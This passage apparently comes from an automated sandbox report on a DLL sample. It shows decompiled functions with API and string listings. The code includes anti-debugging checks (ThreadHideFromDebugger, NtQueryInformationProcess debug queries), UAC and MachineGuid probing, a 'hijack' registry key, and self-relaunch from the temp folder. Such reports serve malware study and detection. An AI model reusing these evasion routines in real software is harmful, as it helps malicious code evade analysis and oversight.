                                                                                                                                                      • Opcode ID: 0f455f5a677937442b34762e6ef3df5d8741d0011f32a81b29d44a10479100eb
                                                                                                                                                      • Instruction ID: 0b553024b132d835b53bcc3061d3cd906e00f9f3519ff007c74d2c873b7cba87
                                                                                                                                                      • Opcode Fuzzy Hash: 0f455f5a677937442b34762e6ef3df5d8741d0011f32a81b29d44a10479100eb
                                                                                                                                                      • Instruction Fuzzy Hash: A071D274A00249EFDB04CF94C994AAEB7F1FF48304F618199E915AB341D735EE81CBA5
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      C-Code - Quality: 71%
                                                                                                                                                      			E1001FDC0(void* __ebx, void* __edi, void* __esi, void* __eflags, char _a4) {
                                                                                                                                                      				char _v8;
                                                                                                                                                      				intOrPtr _v16;
                                                                                                                                                      				char _v44;
                                                                                                                                                      				char _v311;
                                                                                                                                                      				char _v312;
                                                                                                                                                      				char _v575;
                                                                                                                                                      				char _v576;
                                                                                                                                                      				void* _t30;
                                                                                                                                                      				intOrPtr _t43;
                                                                                                                                                      				void* _t50;
                                                                                                                                                      
                                                                                                                                                      				_t50 = __eflags;
                                                                                                                                                      				_t41 = __edi;
                                                                                                                                                      				_push(0xffffffff);
                                                                                                                                                      				_push(E10022ADF);
                                                                                                                                                      				_push( *[fs:0x0]);
                                                                                                                                                      				 *[fs:0x0] = _t43;
                                                                                                                                                      				_v8 = 0;
                                                                                                                                                      				_v576 = 0;
                                                                                                                                                      				E1000CF20(__edi,  &_v575, 0, 0x103);
                                                                                                                                                      				_v312 = 0;
                                                                                                                                                      				E1000CF20(_t41,  &_v311, 0, 0x103);
                                                                                                                                                      				E1001A600(__ebx, _t41, __esi, _t50,  &_v44);
                                                                                                                                                      				GetTempPathA(0x104,  &_v576);
                                                                                                                                                      				_push(E100011E0( &_a4));
                                                                                                                                                      				_push(E100011E0( &_v44));
                                                                                                                                                      				E1000CC93(_t41,  &_v312, "%s%s 200 %s",  &_v576);
                                                                                                                                                      				E1001A1D0(_t50,  &_v312);
                                                                                                                                                      				E100011A0( &_v44);
                                                                                                                                                      				_v8 = 0xffffffff;
                                                                                                                                                      				_t30 = E100011A0( &_a4);
                                                                                                                                                      				 *[fs:0x0] = _v16;
                                                                                                                                                      				return _t30;
                                                                                                                                                      			}














                                                                                                                                                      APIs
                                                                                                                                                      • _memset.LIBCMT ref: 1001FDFA
                                                                                                                                                      • _memset.LIBCMT ref: 1001FE17
                                                                                                                                                        • Part of subcall function 1001A600: _memset.LIBCMT ref: 1001A651
                                                                                                                                                        • Part of subcall function 1001A600: GetModuleFileNameA.KERNEL32(00000000,00000000,00000104), ref: 1001A667
                                                                                                                                                        • Part of subcall function 1001A600: _sprintf.LIBCMT ref: 1001A6A5
                                                                                                                                                      • GetTempPathA.KERNEL32(00000104,00000000), ref: 1001FE37
                                                                                                                                                      • _sprintf.LIBCMT ref: 1001FE62
                                                                                                                                                        • Part of subcall function 1001A1D0: _memset.LIBCMT ref: 1001A1E5
                                                                                                                                                        • Part of subcall function 1001A1D0: _memset.LIBCMT ref: 1001A209
                                                                                                                                                        • Part of subcall function 1001A1D0: CreateProcessA.KERNEL32(00000000,1001FD2F,00000000,00000000,00000000,00000000,00000000,00000000,00000044,?), ref: 1001A22B
                                                                                                                                                        • Part of subcall function 1001A1D0: CloseHandle.KERNEL32(?), ref: 1001A239
                                                                                                                                                        • Part of subcall function 1001A1D0: CloseHandle.KERNEL32(?), ref: 1001A243
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000002.00000002.418199354.0000000010001000.00000020.00000001.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                      • Associated: 00000002.00000002.418193488.0000000010000000.00000004.00000001.sdmp
                                                                                                                                                      • Associated: 00000002.00000002.418216949.0000000010023000.00000002.00000001.sdmp
                                                                                                                                                      • Associated: 00000002.00000002.418526635.0000000010332000.00000004.00000001.sdmp
                                                                                                                                                      • Associated: 00000002.00000002.418534419.0000000010337000.00000002.00000001.sdmp
                                                                                                                                                      • Associated: 00000002.00000002.418540972.0000000010338000.00000004.00000001.sdmp
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: _memset$CloseHandle_sprintf$CreateFileModuleNamePathProcessTemp
                                                                                                                                                      • String ID: %s%s 200 %s
                                                                                                                                                      • API String ID: 3552933064-2772210913
                                                                                                                                                      • Opcode ID: c3d26593a62fb1594e39bc9ee517a8b38b6f03e22f0bfca02fd24b37d5fb5c36
                                                                                                                                                      • Instruction ID: fa445e4306be4de550b1f58f9f77f959fb08a7f600bfac00d2f80f5c48e4b5e6
                                                                                                                                                      • Opcode Fuzzy Hash: c3d26593a62fb1594e39bc9ee517a8b38b6f03e22f0bfca02fd24b37d5fb5c36
                                                                                                                                                      • Instruction Fuzzy Hash: B01198B6C00208ABE714EB90DC56FDE777CEB14750F4441A4F615A61C5EB747B88CBA1
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      C-Code - Quality: 91%
                                                                                                                                                      			E1001F990(void* __ebx, void* __edi, void* __esi, void* __eflags, intOrPtr _a4) {
                                                                                                                                                      				intOrPtr _v8;
                                                                                                                                                      				char _v12;
                                                                                                                                                      				char _v275;
                                                                                                                                                      				char _v276;
                                                                                                                                                      				void* __ebp;
                                                                                                                                                      				void* _t20;
                                                                                                                                                      				void* _t37;
                                                                                                                                                      
                                                                                                                                                      				_t37 = __eflags;
                                                                                                                                                      				_t28 = __edi;
                                                                                                                                                      				_v276 = 0;
                                                                                                                                                      				E1000CF20(__edi,  &_v275, 0, 0x103);
                                                                                                                                                      				_v12 = 0x104;
                                                                                                                                                      				E1001A2F0( &_v276,  &_v12);
                                                                                                                                                      				E1000CD96( &_v276,  &_v276, 0x104, "hijack");
                                                                                                                                                      				_v8 = E1001A480(__ebx,  &_v276, _t28, __esi, _t37,  &_v276);
                                                                                                                                                      				_t20 = E1000CC93(_t28, _a4, "SOFTWARE\\Microsoft\\%s", _v8);
                                                                                                                                                      				_t38 = _v8;
                                                                                                                                                      				if(_v8 != 0) {
                                                                                                                                                      					_push(_v8);
                                                                                                                                                      					return E1000CA30(__ebx, _t28, __esi, _t38);
                                                                                                                                                      				}
                                                                                                                                                      				return _t20;
                                                                                                                                                      			}











                                                                                                                                                      APIs
                                                                                                                                                      • _memset.LIBCMT ref: 1001F9AE
                                                                                                                                                        • Part of subcall function 1001A2F0: RegOpenKeyExA.ADVAPI32(80000002,Software\Microsoft\Cryptography,00000000,00000101,00000000), ref: 1001A319
                                                                                                                                                      • _strcat_s.LIBCMT ref: 1001F9E1
                                                                                                                                                        • Part of subcall function 1001A480: _memset.LIBCMT ref: 1001A4BB
                                                                                                                                                        • Part of subcall function 1001A480: _memset.LIBCMT ref: 1001A4CE
                                                                                                                                                        • Part of subcall function 1001A480: _strlen.LIBCMT ref: 1001A4DA
                                                                                                                                                        • Part of subcall function 1001A480: _strlen.LIBCMT ref: 1001A4FD
                                                                                                                                                        • Part of subcall function 1001A480: _sprintf.LIBCMT ref: 1001A56C
                                                                                                                                                        • Part of subcall function 1001A480: _memset.LIBCMT ref: 1001A5B6
                                                                                                                                                      • _sprintf.LIBCMT ref: 1001FA08
                                                                                                                                                        • Part of subcall function 1000CA30: ___sbh_find_block.LIBCMT ref: 1000CA59
                                                                                                                                                        • Part of subcall function 1000CA30: ___sbh_free_block.LIBCMT ref: 1000CA68
                                                                                                                                                        • Part of subcall function 1000CA30: RtlFreeHeap.NTDLL(00000000,?,103301C0,Function_0000CA30,1001322F,00000000), ref: 1000CA98
                                                                                                                                                        • Part of subcall function 1000CA30: GetLastError.KERNEL32(?,?,?,?,?,?,?,103301C0), ref: 1000CAA9
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000002.00000002.418199354.0000000010001000.00000020.00000001.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                      • Associated: 00000002.00000002.418193488.0000000010000000.00000004.00000001.sdmp
                                                                                                                                                      • Associated: 00000002.00000002.418216949.0000000010023000.00000002.00000001.sdmp
                                                                                                                                                      • Associated: 00000002.00000002.418526635.0000000010332000.00000004.00000001.sdmp
                                                                                                                                                      • Associated: 00000002.00000002.418534419.0000000010337000.00000002.00000001.sdmp
                                                                                                                                                      • Associated: 00000002.00000002.418540972.0000000010338000.00000004.00000001.sdmp
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: _memset$_sprintf_strlen$ErrorFreeHeapLastOpen___sbh_find_block___sbh_free_block_strcat_s
                                                                                                                                                      • String ID: SOFTWARE\Microsoft\%s$hijack
                                                                                                                                                      • API String ID: 3138967372-3622423033
                                                                                                                                                      • Opcode ID: ada38b5ab26f5dc62f486429ffaac0b96da48a560580f8f5e3c1f71cb78a86e2
                                                                                                                                                      • Instruction ID: 9399b5cfcd873c48396239d23a26fdd32b2e9067639008cfe42ca2b6aed02eb6
                                                                                                                                                      • Opcode Fuzzy Hash: ada38b5ab26f5dc62f486429ffaac0b96da48a560580f8f5e3c1f71cb78a86e2
                                                                                                                                                      • Instruction Fuzzy Hash: 7D0152FAC0020CA7DB15D7A0EC47FE97378DB58304F0404A9E61856141F6B5A7C8CB92
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      C-Code - Quality: 100%
                                                                                                                                                      			E1001D240() {
                                                                                                                                                      				void* _v8;
                                                                                                                                                      				int _v12;
                                                                                                                                                      				signed int _v16;
                                                                                                                                                      				int _v20;
                                                                                                                                                      				char _v24;
                                                                                                                                                      
                                                                                                                                                      				_v12 = 4;
                                                                                                                                                      				_v20 = 4;
                                                                                                                                                      				_v16 = 0;
                                                                                                                                                      				_v8 = 0;
                                                                                                                                                      				_v24 = 0;
                                                                                                                                                      				if(RegOpenKeyExW(0x80000002, L"SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\System\\", 0, 0x20019,  &_v8) == 0) {
                                                                                                                                                      					if(RegQueryValueExW(_v8, L"EnableLUA", 0,  &_v12,  &_v24,  &_v20) == 0) {
                                                                                                                                                      						_v16 = 0 | _v24 == 0x00000001;
                                                                                                                                                      					}
                                                                                                                                                      					RegCloseKey(_v8);
                                                                                                                                                      				}
                                                                                                                                                      				return _v16;
                                                                                                                                                      			}









                                                                                                                                                      APIs
                                                                                                                                                      • RegOpenKeyExW.ADVAPI32(80000002,SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\,00000000,00020019,00000000), ref: 1001D27E
                                                                                                                                                      • RegQueryValueExW.ADVAPI32(00000000,EnableLUA,00000000,00000004,00000000,00000004), ref: 1001D29F
                                                                                                                                                      • RegCloseKey.ADVAPI32(00000000), ref: 1001D2B9
                                                                                                                                                      Strings
                                                                                                                                                      • SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\, xrefs: 1001D274
                                                                                                                                                      • EnableLUA, xrefs: 1001D296
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000002.00000002.418199354.0000000010001000.00000020.00000001.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                      • Associated: 00000002.00000002.418193488.0000000010000000.00000004.00000001.sdmp
                                                                                                                                                      • Associated: 00000002.00000002.418216949.0000000010023000.00000002.00000001.sdmp
                                                                                                                                                      • Associated: 00000002.00000002.418526635.0000000010332000.00000004.00000001.sdmp
                                                                                                                                                      • Associated: 00000002.00000002.418534419.0000000010337000.00000002.00000001.sdmp
                                                                                                                                                      • Associated: 00000002.00000002.418540972.0000000010338000.00000004.00000001.sdmp
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: CloseOpenQueryValue
                                                                                                                                                      • String ID: EnableLUA$SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\
                                                                                                                                                      • API String ID: 3677997916-2194944742
                                                                                                                                                      • Opcode ID: 266f08e0f126cb4b8deb597b18c5a4e6f0f9f98ecfb3ee9ea26cd0a9d97fb6d8
                                                                                                                                                      • Instruction ID: 5282c0b80e2e5c01901b155bdceaa9b4f75acfd53aa6edd49772c4382101ddc9
                                                                                                                                                      • Opcode Fuzzy Hash: 266f08e0f126cb4b8deb597b18c5a4e6f0f9f98ecfb3ee9ea26cd0a9d97fb6d8
                                                                                                                                                      • Instruction Fuzzy Hash: EC01FFB5D00219FBEB04DFD1CD98BEEBBB8EB44305F108059E611BA280D7B59B04CB61
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      C-Code - Quality: 100%
                                                                                                                                                      			E1001A2F0(char* _a4, int* _a8) {
                                                                                                                                                      				void* _v8;
                                                                                                                                                      				int* _v12;
                                                                                                                                                      
                                                                                                                                                      				_v12 = 0;
                                                                                                                                                      				_v8 = 0;
                                                                                                                                                      				if(RegOpenKeyExA(0x80000002, "Software\\Microsoft\\Cryptography", 0, 0x101,  &_v8) == 0) {
                                                                                                                                                      					if(RegQueryValueExA(_v8, "MachineGuid", 0, 0, _a4, _a8) == 0) {
                                                                                                                                                      						_v12 = 1;
                                                                                                                                                      					}
                                                                                                                                                      					RegCloseKey(_v8);
                                                                                                                                                      					return _v12;
                                                                                                                                                      				}
                                                                                                                                                      				return 0;
                                                                                                                                                      			}






                                                                                                                                                      APIs
                                                                                                                                                      • RegOpenKeyExA.ADVAPI32(80000002,Software\Microsoft\Cryptography,00000000,00000101,00000000), ref: 1001A319
                                                                                                                                                      • RegQueryValueExA.ADVAPI32(00000000,MachineGuid,00000000,00000000,00000000,?), ref: 1001A33C
                                                                                                                                                      • RegCloseKey.ADVAPI32(00000000), ref: 1001A355
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000002.00000002.418199354.0000000010001000.00000020.00000001.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                      • Associated: 00000002.00000002.418193488.0000000010000000.00000004.00000001.sdmp
                                                                                                                                                      • Associated: 00000002.00000002.418216949.0000000010023000.00000002.00000001.sdmp
                                                                                                                                                      • Associated: 00000002.00000002.418526635.0000000010332000.00000004.00000001.sdmp
                                                                                                                                                      • Associated: 00000002.00000002.418534419.0000000010337000.00000002.00000001.sdmp
                                                                                                                                                      • Associated: 00000002.00000002.418540972.0000000010338000.00000004.00000001.sdmp
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: CloseOpenQueryValue
                                                                                                                                                      • String ID: MachineGuid$Software\Microsoft\Cryptography
                                                                                                                                                      • API String ID: 3677997916-880526231
                                                                                                                                                      • Opcode ID: f1368378e2473503bb2df203a544f45284ed9076fd4207f94550af1e67aefda2
                                                                                                                                                      • Instruction ID: 9e24c58cdf23cf18939fbcaabd435f76492adcd0c706e8d6ab3c4d486606bf24
                                                                                                                                                      • Opcode Fuzzy Hash: f1368378e2473503bb2df203a544f45284ed9076fd4207f94550af1e67aefda2
                                                                                                                                                      • Instruction Fuzzy Hash: 71F0F474600208FBEB10DFA4CC85F9D77B8EB04745F608044FA15AA180D775DB819765
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      C-Code - Quality: 60%
                                                                                                                                                      			E10013389(void* __ebx, void* __esi) {
                                                                                                                                                      				void* _t1;
                                                                                                                                                      				long _t5;
                                                                                                                                                      				void* _t9;
                                                                                                                                                      				void* _t11;
                                                                                                                                                      				void* _t15;
                                                                                                                                                      
                                                                                                                                                      				_t9 = __ebx;
                                                                                                                                                      				_t1 = TlsGetValue( *0x10332c6c);
                                                                                                                                                      				_t16 = _t1;
                                                                                                                                                      				if(_t1 != 0) {
                                                                                                                                                      					_push( *0x10332c68);
                                                                                                                                                      					_t11 =  *(TlsGetValue( *0x10332c6c))();
                                                                                                                                                      				}
                                                                                                                                                      				_pop(_t15);
                                                                                                                                                      				_push(0);
                                                                                                                                                      				_push( *0x10332c68);
                                                                                                                                                      				 *((intOrPtr*)(E10013034( *0x10333820)))();
                                                                                                                                                      				_push(_t11);
                                                                                                                                                      				L10013256(_t9, _t11, _t15, _t16);
                                                                                                                                                      				_t5 =  *0x10332c6c; // 0x1d
                                                                                                                                                      				if(_t5 != 0xffffffff) {
                                                                                                                                                      					return TlsSetValue(_t5, 0);
                                                                                                                                                      				}
                                                                                                                                                      				return _t5;
                                                                                                                                                      			}









                                                                                                                                                      APIs
                                                                                                                                                      • TlsGetValue.KERNEL32 ref: 10013396
                                                                                                                                                      • TlsGetValue.KERNEL32 ref: 100133A8
                                                                                                                                                      • __decode_pointer.LIBCMT ref: 100133BD
                                                                                                                                                      • TlsSetValue.KERNEL32(0000001D,00000000,1000EAC9,00000000,?,?,00000001,?,?,1000EB2D,00000001,?,?,10330240,0000000C,1000EBE7), ref: 100133D9
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000002.00000002.418199354.0000000010001000.00000020.00000001.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                      • Associated: 00000002.00000002.418193488.0000000010000000.00000004.00000001.sdmp
                                                                                                                                                      • Associated: 00000002.00000002.418216949.0000000010023000.00000002.00000001.sdmp
                                                                                                                                                      • Associated: 00000002.00000002.418526635.0000000010332000.00000004.00000001.sdmp
                                                                                                                                                      • Associated: 00000002.00000002.418534419.0000000010337000.00000002.00000001.sdmp
                                                                                                                                                      • Associated: 00000002.00000002.418540972.0000000010338000.00000004.00000001.sdmp
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: Value$__decode_pointer
                                                                                                                                                      • String ID: tj
                                                                                                                                                      • API String ID: 3389472636-3491506833
                                                                                                                                                      • Opcode ID: 98b685037422a500dab51c28cbe3472850961789b495b2f1d75dbfea88fe638a
                                                                                                                                                      • Instruction ID: a5e655cd75536ae3ffa2bd70bd2a424c71ddb38a18ae7223bb1ec647065a0f02
                                                                                                                                                      • Opcode Fuzzy Hash: 98b685037422a500dab51c28cbe3472850961789b495b2f1d75dbfea88fe638a
                                                                                                                                                      • Instruction Fuzzy Hash: CDE06D31500120AEDA12A768DCC4B5D3FAAFB84260F249111F418DE1B1CF31DE96DA54
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      C-Code - Quality: 68%
                                                                                                                                                      			E10019F00() {
                                                                                                                                                      				char _v8;
                                                                                                                                                      				_Unknown_base(*)()* _v12;
                                                                                                                                                      				struct HINSTANCE__* _v16;
                                                                                                                                                      
                                                                                                                                                      				_v8 = 1;
                                                                                                                                                      				_v16 = LoadLibraryA("Ntdll.dll");
                                                                                                                                                      				_v12 = GetProcAddress(_v16, "NtQueryInformationProcess");
                                                                                                                                                      				_v12(GetCurrentProcess(), 0x1f,  &_v8, 4, 0);
                                                                                                                                                      				return 0 | _v8 != 0x00000001;
                                                                                                                                                      			}







                                                                                                                                                      APIs
                                                                                                                                                      • LoadLibraryA.KERNEL32(Ntdll.dll), ref: 10019F12
                                                                                                                                                      • GetProcAddress.KERNEL32(?,NtQueryInformationProcess), ref: 10019F24
                                                                                                                                                      • GetCurrentProcess.KERNEL32(0000001F,00000001,00000004,00000000), ref: 10019F37
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000002.00000002.418199354.0000000010001000.00000020.00000001.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                      • Associated: 00000002.00000002.418193488.0000000010000000.00000004.00000001.sdmp
                                                                                                                                                      • Associated: 00000002.00000002.418216949.0000000010023000.00000002.00000001.sdmp
                                                                                                                                                      • Associated: 00000002.00000002.418526635.0000000010332000.00000004.00000001.sdmp
                                                                                                                                                      • Associated: 00000002.00000002.418534419.0000000010337000.00000002.00000001.sdmp
                                                                                                                                                      • Associated: 00000002.00000002.418540972.0000000010338000.00000004.00000001.sdmp
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: AddressCurrentLibraryLoadProcProcess
                                                                                                                                                      • String ID: NtQueryInformationProcess$Ntdll.dll
                                                                                                                                                      • API String ID: 353374858-801751246
                                                                                                                                                      • Opcode ID: 299e7fd2ffe35789e5c5ceba6014bb3d0f648db3e037f5c09f603e7f91a54977
                                                                                                                                                      • Instruction ID: 96ba2470dd98e020bf0cfbce012c3df4c205278cc2531598ec11657ea2300d3b
                                                                                                                                                      • Opcode Fuzzy Hash: 299e7fd2ffe35789e5c5ceba6014bb3d0f648db3e037f5c09f603e7f91a54977
                                                                                                                                                      • Instruction Fuzzy Hash: F5F03075D00208FFEB00DFE0CC8DADCBB74EB04301F508094FA01A6140D6745A48CB61
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      C-Code - Quality: 68%
                                                                                                                                                      			E10019F50() {
                                                                                                                                                      				char _v8;
                                                                                                                                                      				_Unknown_base(*)()* _v12;
                                                                                                                                                      				struct HINSTANCE__* _v16;
                                                                                                                                                      
                                                                                                                                                      				_v8 = 0;
                                                                                                                                                      				_v16 = LoadLibraryA("Ntdll.dll");
                                                                                                                                                      				_v12 = GetProcAddress(_v16, "NtQueryInformationProcess");
                                                                                                                                                      				_v12(GetCurrentProcess(), 0x1e,  &_v8, 4, 0);
                                                                                                                                                      				return 0 | _v8 != 0x00000000;
                                                                                                                                                      			}







                                                                                                                                                      APIs
                                                                                                                                                      • LoadLibraryA.KERNEL32(Ntdll.dll), ref: 10019F62
                                                                                                                                                      • GetProcAddress.KERNEL32(?,NtQueryInformationProcess), ref: 10019F74
                                                                                                                                                      • GetCurrentProcess.KERNEL32(0000001E,00000000,00000004,00000000), ref: 10019F87
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000002.00000002.418199354.0000000010001000.00000020.00000001.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                      • Associated: 00000002.00000002.418193488.0000000010000000.00000004.00000001.sdmp
                                                                                                                                                      • Associated: 00000002.00000002.418216949.0000000010023000.00000002.00000001.sdmp
                                                                                                                                                      • Associated: 00000002.00000002.418526635.0000000010332000.00000004.00000001.sdmp
                                                                                                                                                      • Associated: 00000002.00000002.418534419.0000000010337000.00000002.00000001.sdmp
                                                                                                                                                      • Associated: 00000002.00000002.418540972.0000000010338000.00000004.00000001.sdmp
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: AddressCurrentLibraryLoadProcProcess
                                                                                                                                                      • String ID: NtQueryInformationProcess$Ntdll.dll
                                                                                                                                                      • API String ID: 353374858-801751246
                                                                                                                                                      • Opcode ID: 5324bd590ae2d935f737936b9c2bb7a29ce3f6ecd0286ca9cc490fcedce8d1c6
                                                                                                                                                      • Instruction ID: 4290971ec9e7b3841b7fe9691c0d5d42a9a3d927b1d111e6c5789e877817e371
                                                                                                                                                      • Opcode Fuzzy Hash: 5324bd590ae2d935f737936b9c2bb7a29ce3f6ecd0286ca9cc490fcedce8d1c6
                                                                                                                                                      • Instruction Fuzzy Hash: 7FF0A575900218FBEB00EBE0DD89BDDBBB8EB04705F618498EA01A6280DA745A49DB65
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      C-Code - Quality: 68%
                                                                                                                                                      			E10019FA0() {
                                                                                                                                                      				char _v8;
                                                                                                                                                      				_Unknown_base(*)()* _v12;
                                                                                                                                                      				struct HINSTANCE__* _v16;
                                                                                                                                                      
                                                                                                                                                      				_v8 = 0;
                                                                                                                                                      				_v16 = LoadLibraryA("Ntdll.dll");
                                                                                                                                                      				_v12 = GetProcAddress(_v16, "NtQueryInformationProcess");
                                                                                                                                                      				_v12(GetCurrentProcess(), 7,  &_v8, 4, 0);
                                                                                                                                                      				return 0 | _v8 != 0x00000000;
                                                                                                                                                      			}







                                                                                                                                                      APIs
                                                                                                                                                      • LoadLibraryA.KERNEL32(Ntdll.dll), ref: 10019FB2
                                                                                                                                                      • GetProcAddress.KERNEL32(?,NtQueryInformationProcess), ref: 10019FC4
                                                                                                                                                      • GetCurrentProcess.KERNEL32(00000007,00000000,00000004,00000000), ref: 10019FD7
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000002.00000002.418199354.0000000010001000.00000020.00000001.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                      • Associated: 00000002.00000002.418193488.0000000010000000.00000004.00000001.sdmp
                                                                                                                                                      • Associated: 00000002.00000002.418216949.0000000010023000.00000002.00000001.sdmp
                                                                                                                                                      • Associated: 00000002.00000002.418526635.0000000010332000.00000004.00000001.sdmp
                                                                                                                                                      • Associated: 00000002.00000002.418534419.0000000010337000.00000002.00000001.sdmp
                                                                                                                                                      • Associated: 00000002.00000002.418540972.0000000010338000.00000004.00000001.sdmp
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: AddressCurrentLibraryLoadProcProcess
                                                                                                                                                      • String ID: NtQueryInformationProcess$Ntdll.dll
                                                                                                                                                      • API String ID: 353374858-801751246
                                                                                                                                                      • Opcode ID: e4e449fd2582a4a912ce4590722a3fea1b530a5e0b7ff34467c0788b23f79e4c
                                                                                                                                                      • Instruction ID: a091bf084543d9cc22bc0e3cc688341cf2a1c1168494879eaf10af3ffd9ffb2e
                                                                                                                                                      • Opcode Fuzzy Hash: e4e449fd2582a4a912ce4590722a3fea1b530a5e0b7ff34467c0788b23f79e4c
                                                                                                                                                      • Instruction Fuzzy Hash: EEF0C075D44208FFEB00DFE0DD4DB9DBBB8EB04301F518494FA05A6180D7745A49CB65
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      C-Code - Quality: 68%
                                                                                                                                                      			E10019D40() {
                                                                                                                                                      				_Unknown_base(*)()* _v8;
                                                                                                                                                      				struct HINSTANCE__* _v12;
                                                                                                                                                      
                                                                                                                                                      				_v12 = LoadLibraryA("Ntdll.dll");
                                                                                                                                                      				_v8 = GetProcAddress(_v12, "ZwSetInformationThread");
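                                                                                                                                                      				/* 0x11 is the ThreadHideFromDebugger information class: once set, an attached debugger no longer receives events for this thread. */
                                                                                                                                                      				return _v8(GetCurrentThread(), 0x11, 0, 0);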
                                                                                                                                                      			}





                                                                                                                                                      APIs
                                                                                                                                                      • LoadLibraryA.KERNEL32(Ntdll.dll,?,100206A1), ref: 10019D4B
                                                                                                                                                      • GetProcAddress.KERNEL32(?,ZwSetInformationThread), ref: 10019D5D
                                                                                                                                                      • GetCurrentThread.KERNEL32 ref: 10019D6C
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000002.00000002.418199354.0000000010001000.00000020.00000001.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                      • Associated: 00000002.00000002.418193488.0000000010000000.00000004.00000001.sdmp
                                                                                                                                                      • Associated: 00000002.00000002.418216949.0000000010023000.00000002.00000001.sdmp
                                                                                                                                                      • Associated: 00000002.00000002.418526635.0000000010332000.00000004.00000001.sdmp
                                                                                                                                                      • Associated: 00000002.00000002.418534419.0000000010337000.00000002.00000001.sdmp
                                                                                                                                                      • Associated: 00000002.00000002.418540972.0000000010338000.00000004.00000001.sdmp
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: AddressCurrentLibraryLoadProcThread
                                                                                                                                                      • String ID: Ntdll.dll$ZwSetInformationThread
                                                                                                                                                      • API String ID: 903204110-1680533912
                                                                                                                                                      • Opcode ID: 68ad7e6b782c0f1e3664fc4a4fea26a1abbd1340330e0d1141474a821f8a2a15
                                                                                                                                                      • Instruction ID: 29caf765b55be7bf21a38254d48f72174c1d944e91014696290b2e85dee50fc2
                                                                                                                                                      • Opcode Fuzzy Hash: 68ad7e6b782c0f1e3664fc4a4fea26a1abbd1340330e0d1141474a821f8a2a15
                                                                                                                                                      • Instruction Fuzzy Hash: 5CE0EC74940208FBFF00EBE0AD8DB9CBB78FB04702F618095FE01A6280DAB059058AB5
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      C-Code - Quality: 93%
                                                                                                                                                      			E1001F4A0(void* _a4, char* _a8) {
                                                                                                                                                      				char* _v8;
                                                                                                                                                      				struct _FILETIME _v12;
                                                                                                                                                      				void* _v16;
                                                                                                                                                      				struct _SYSTEMTIME _v32;
                                                                                                                                                      				char* _v40;
                                                                                                                                                      				char* _v44;
                                                                                                                                                      				struct _FILETIME _v52;
                                                                                                                                                      				char* _t43;
                                                                                                                                                      
                                                                                                                                                      				_v44 = 0;
                                                                                                                                                      				_v40 = 0;
                                                                                                                                                      				_v16 = 0;
                                                                                                                                                      				if(RegOpenKeyExA(_a4, _a8, 0, 0x101,  &_v16) == 0) {
                                                                                                                                                      					if(RegQueryInfoKeyA(_v16, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,  &_v12) == 0) {
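                                                                                                                                                      						/* Build 1970-01-01 00:00:00 (0x7b2 = 1970), the Unix epoch, as a FILETIME. It is subtracted from the key's last-write time and the result divided by 0x2710 (10000), turning 100 ns ticks into milliseconds since the epoch. */
                                                                                                                                                      						_v32.wYear = 0x7b2;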
                                                                                                                                                      						_v32.wMonth = 1;
                                                                                                                                                      						_v32.wDay = 1;
                                                                                                                                                      						_v32.wHour = 0;
                                                                                                                                                      						_v32.wMinute = 0;
                                                                                                                                                      						_v32.wSecond = 0;
                                                                                                                                                      						_v32.wMilliseconds = 0;
                                                                                                                                                      						SystemTimeToFileTime( &_v32,  &_v52);
                                                                                                                                                      						_t43 = _v8;
                                                                                                                                                      						asm("sbb edx, [ebp-0x2c]");
                                                                                                                                                      						_v44 = E1000F290(_v12 - _v52.dwLowDateTime, _t43, 0x2710, 0);
                                                                                                                                                      						_v40 = _t43;
                                                                                                                                                      					}
                                                                                                                                                      					RegCloseKey(_v16);
                                                                                                                                                      				}
